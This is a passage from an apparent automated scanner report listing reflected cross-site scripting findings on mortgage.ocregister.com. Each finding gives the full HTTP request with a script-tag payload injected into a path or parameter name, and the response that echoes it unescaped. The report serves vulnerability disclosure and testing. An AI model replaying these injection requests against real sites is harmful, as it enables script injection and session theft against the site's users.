Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20074d840\"><script>alert(1)</script>d1f9139be71/06/feed/" />
...[SNIP]...

1.223. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a890"><script>alert(1)</script>7c589308949 was submitted in the REST URL parameter 2. This input was echoed as 2a890\"><script>alert(1)</script>7c589308949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/062a890"><script>alert(1)</script>7c589308949/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/062a890\"><script>alert(1)</script>7c589308949/feed/" />
...[SNIP]...

1.224. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194ec"><script>alert(1)</script>237ccbfc119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 194ec\"><script>alert(1)</script>237ccbfc119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/06/?194ec"><script>alert(1)</script>237ccbfc119=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/06/?194ec\"><script>alert(1)</script>237ccbfc119=1feed/" />
...[SNIP]...

1.225. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23d"><script>alert(1)</script>6e84ace3326 was submitted in the REST URL parameter 1. This input was echoed as 8d23d\"><script>alert(1)</script>6e84ace3326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20078d23d"><script>alert(1)</script>6e84ace3326/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078d23d\"><script>alert(1)</script>6e84ace3326/07/feed/" />
...[SNIP]...

1.226. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d03c"><script>alert(1)</script>c44ede61d27 was submitted in the REST URL parameter 2. This input was echoed as 1d03c\"><script>alert(1)</script>c44ede61d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/071d03c"><script>alert(1)</script>c44ede61d27/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/071d03c\"><script>alert(1)</script>c44ede61d27/feed/" />
...[SNIP]...

1.227. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62aca"><script>alert(1)</script>e6bbf50b3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62aca\"><script>alert(1)</script>e6bbf50b3b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/07/?62aca"><script>alert(1)</script>e6bbf50b3b1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/07/?62aca\"><script>alert(1)</script>e6bbf50b3b1=1feed/" />
...[SNIP]...

1.228. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7bc"><script>alert(1)</script>5aaea72dd5b was submitted in the REST URL parameter 1. This input was echoed as ab7bc\"><script>alert(1)</script>5aaea72dd5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007ab7bc"><script>alert(1)</script>5aaea72dd5b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007ab7bc\"><script>alert(1)</script>5aaea72dd5b/08/feed/" />
...[SNIP]...

1.229. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b467"><script>alert(1)</script>edf8b7e6341 was submitted in the REST URL parameter 2. This input was echoed as 3b467\"><script>alert(1)</script>edf8b7e6341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/083b467"><script>alert(1)</script>edf8b7e6341/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/083b467\"><script>alert(1)</script>edf8b7e6341/feed/" />
...[SNIP]...

1.230. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7dfe"><script>alert(1)</script>03f410c0f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7dfe\"><script>alert(1)</script>03f410c0f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/08/?c7dfe"><script>alert(1)</script>03f410c0f9f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/08/?c7dfe\"><script>alert(1)</script>03f410c0f9f=1feed/" />
...[SNIP]...

1.231. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193b6"><script>alert(1)</script>602a3651353 was submitted in the REST URL parameter 1. This input was echoed as 193b6\"><script>alert(1)</script>602a3651353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007193b6"><script>alert(1)</script>602a3651353/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007193b6\"><script>alert(1)</script>602a3651353/09/feed/" />
...[SNIP]...

1.232. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab9b"><script>alert(1)</script>7e39935c7da was submitted in the REST URL parameter 2. This input was echoed as eab9b\"><script>alert(1)</script>7e39935c7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/09eab9b"><script>alert(1)</script>7e39935c7da/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09eab9b\"><script>alert(1)</script>7e39935c7da/feed/" />
...[SNIP]...

1.233. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7116"><script>alert(1)</script>1999014b26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7116\"><script>alert(1)</script>1999014b26e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/09/?a7116"><script>alert(1)</script>1999014b26e=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09/?a7116\"><script>alert(1)</script>1999014b26e=1feed/" />
...[SNIP]...

1.234. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfb6"><script>alert(1)</script>2ffcd926e6b was submitted in the REST URL parameter 1. This input was echoed as 8bfb6\"><script>alert(1)</script>2ffcd926e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20078bfb6"><script>alert(1)</script>2ffcd926e6b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078bfb6\"><script>alert(1)</script>2ffcd926e6b/10/feed/" />
...[SNIP]...

1.235. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" />
...[SNIP]...

1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
